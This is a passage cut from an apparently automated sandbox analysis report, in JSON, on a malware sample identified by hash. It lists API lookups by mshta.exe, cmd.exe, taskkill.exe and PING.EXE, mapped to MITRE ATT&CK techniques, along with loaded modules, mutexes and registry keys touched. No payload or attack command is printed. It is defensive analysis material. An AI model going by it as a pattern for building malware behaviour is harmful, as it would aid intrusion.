\"GetProcAddress\" with a parameter HTTPSCertificateTrust (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter HTTPSFinalProv (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SoftpubInitialize (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SoftpubLoadMessage (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SoftpubLoadSignature (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SoftpubCheckCert (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SoftpubCleanup (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter BCryptOpenAlgorithmProvider (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter BCryptGetProperty (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter BCryptCreateHash (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter BCryptHashData (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter BCryptFinishHash (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter BCryptDestroyHash (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CryptGetKeyParam (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CryptDestroyKey (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetAsymmetricEncryptionInterface (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter BCryptImportKeyPair (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter BCryptVerifySignature (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter BCryptDestroyKey (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter I_CryptNetGetConnectivity (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter IsNetworkAlive (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CryptRetrieveObjectByUrlW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter UrlGetPartW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpOpen (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter StrRChrA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetProductInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter InitSecurityInterfaceW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter InitSecurityInterfaceA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetAuthInfoExW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetOption (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpSetTimeouts (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpSetOption (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpCrackUrl (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter StrCmpNW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpConnect (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WSAStringToAddressW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpOpenRequest (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter UrlCanonicalizeW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpGetDefaultProxyConfiguration (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpGetIEProxyConfigForCurrentUser (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RtlConvertSidToUnicodeString (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter NsiAllocateAndGetTable (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CM_Open_Class_Key_ExW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter NsiFreeTable (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpSendRequest (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WSASocketW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter FreeAddrInfoW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpReceiveResponse (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpQueryHeaders (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter StrStrIW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpQueryDataAvailable (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpReadData (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WinHttpCloseHandle (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RpcBindingFree (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SetupIterateCabinetW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter DevRtlGetThreadLogToken (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RpcEpResolveBinding (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter NdrClientCall2 (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CertDllVerifyRevocation (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WTHelperProvDataFromStateData (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter WTHelperGetProvSignerFromChain (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CertDuplicateCertificateChain (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CertFreeCertificateChain (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CertFreeCertificateContext (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter DeleteSecurityContext (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SslDecrementProviderReferenceCount (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SslFreeObject (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter FreeAddrInfoExW (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter GetSignatureInterface (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CryptVerifySignatureA (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter CertGetCertificateContextProperty (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SslLookupCipherSuiteInfo (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SslLookupCipherLengths (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SealMessage (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SslEncryptPacket (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter UnsealMessage (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter SslDecryptPacket (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetProcAddress\" with a parameter RevokeDragDrop (UID: 00000000-00003044)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003404)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00003404)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00003404)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00003404)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter NtQueryInformationProcess (UID: 00000000-00003404)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003404)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter WinStationCloseServer (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter WinStationOpenServerW (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter WinStationFreeGAPMemory (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter WinStationGetAllProcesses (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter WinStationEnumerateProcesses (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter GetThreadPreferredUILanguages (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter SetThreadPreferredUILanguages (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLocaleName (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter EtwRegisterTraceGuidsW (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter EtwUnregisterTraceGuids (UID: 00000000-00002988)\n \"taskkill.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002988)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHAddressToString (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHEnumProtocols (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHGetProviderGuid (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHGetSockaddrType (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHGetSocketInformation (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHGetWSAProtocolInfo (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHGetWildcardSockaddr (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHGetWinsockMapping (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHIoctl (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHJoinLeaf (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHNotify (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHOpenSocket (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHOpenSocket2 (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHSetSocketInformation (UID: 00000000-00002080)\n \"PING.EXE\" called \"GetProcAddress\" with a parameter WSHStringToAddress (UID: 00000000-00002080)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03ed16b@ADVAPI32.dll\"\n \"0e000f00703fd16b@ADVAPI32.dll\"\n \"0e000f00cc3fd16b@ADVAPI32.dll\"\n \"11001200b447d16b@ADVAPI32.dll\"\n \"110012004848d16b@ADVAPI32.dll\"\n \"120013008c48d16b@ADVAPI32.dll\"\n \"12001300e448d16b@ADVAPI32.dll\"\n \"14001500386ed16b@ADVAPI32.dll\"\n \"14001500506ed16b@ADVAPI32.dll\"\n \"14001500686ed16b@ADVAPI32.dll\"\n \"17001800806ed16b@ADVAPI32.dll\"\n \"0d000e00986ed16b@ADVAPI32.dll\"\n \"11001200a86ed16b@ADVAPI32.dll\"\n \"11001200bc6ed16b@ADVAPI32.dll\"\n \"0f001000fc6fd16b@ADVAPI32.dll\"\n \"140015003c70d16b@ADVAPI32.dll\"\n \"140015005470d16b@ADVAPI32.dll\"\n \"0c000d009c70d16b@ADVAPI32.dll\"\n \"0c000d00ac70d16b@ADVAPI32.dll\"\n \"0e000f00bc70d16b@ADVAPI32.dll\"\n \"0e000f00cc70d16b@ADVAPI32.dll\"\n \"0b000c00dc70d16b@ADVAPI32.dll\"\n \"180019001473d16b@RPCRT4.dll\"\n \"130014004073d16b@RPCRT4.dll\"\n \"140015005473d16b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75470000\n \"mshta.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75470000\n \"mshta.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 75030000\n \"taskkill.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75470000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\MidiMapper_modLongMessage_RefCnt\"\n \"\\Sessions\\1\\BaseNamedObjects\\shell.{00E844BC-22E8-78AF-BBC2-637E684F7F6A}\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_Voices_Tokens_MS-Anna-1033-20-DSK_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_Voices_Tokens_MS-Anna-1033-20-DSK_Lex_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_CURRENT_USER_SOFTWARE_Microsoft_Speech_CurrentUserLexicon_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\30F1B4D6-EEDA-11d2-9C23-00C04F8EF87C\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\{2F2B4A04-96B6-4F6A-974E-A71A37220067}-Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_Chinese_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_English_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_French_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_German_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_Japanese_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_Spanish_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_TraditionalChinese_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_Universal_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_AudioOutput_TokenEnums_MMAudioOut_Mutex\"\n \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_English_Mutex\"\n \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_AudioOutput_TokenEnums_MMAudioOut_Mutex\"\n \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_TraditionalChinese_Mutex\"\n \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_German_Mutex\"\n \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_Chinese_Mutex\"\n \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_French_Mutex\"\n \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_Voices_Tokens_MS-Anna-1033-20-DSK_Mutex\"\n \"Local\\30F1B4D6-EEDA-11d2-9C23-00C04F8EF87C\"\n \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_Japanese_Mutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"HTML Application\" (Path: \"HKCU\\CLSID\\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"Shortcut\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00021401-0000-0000-C000-000000000046}\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"Library Folder\" (Path: \"HKCU\\CLSID\\{A5A3563A-5755-4A6F-854E-AFA3230B199F}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"CLSID_DBFolder\" (Path: \"HKCU\\CLSID\\{B2952B16-0E07-4E5A-B993-58C52CB94CAE}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"CLSID_KindDescriptionFactory\" (Path: \"HKCU\\CLSID\\{1C1800C1-3258-44C2-BE80-3DEADB6C5E39}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"CLSID_ScopeFactory\" (Path: \"HKCU\\CLSID\\{6746C347-576B-4F73-9012-CDFEEA251BC4}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"CLSID_SearchIDListFactory\" (Path: \"HKCU\\CLSID\\{6E682784-1ECA-4CF2-988D-96B6E89E9A4D}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"Property System\" (Path: \"HKCU\\CLSID\\{B8967F85-58AE-4F46-9FB2-5D7904798F4B}\\TREATAS\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" touched \"Property System Apartment Class Factory\" (Path: 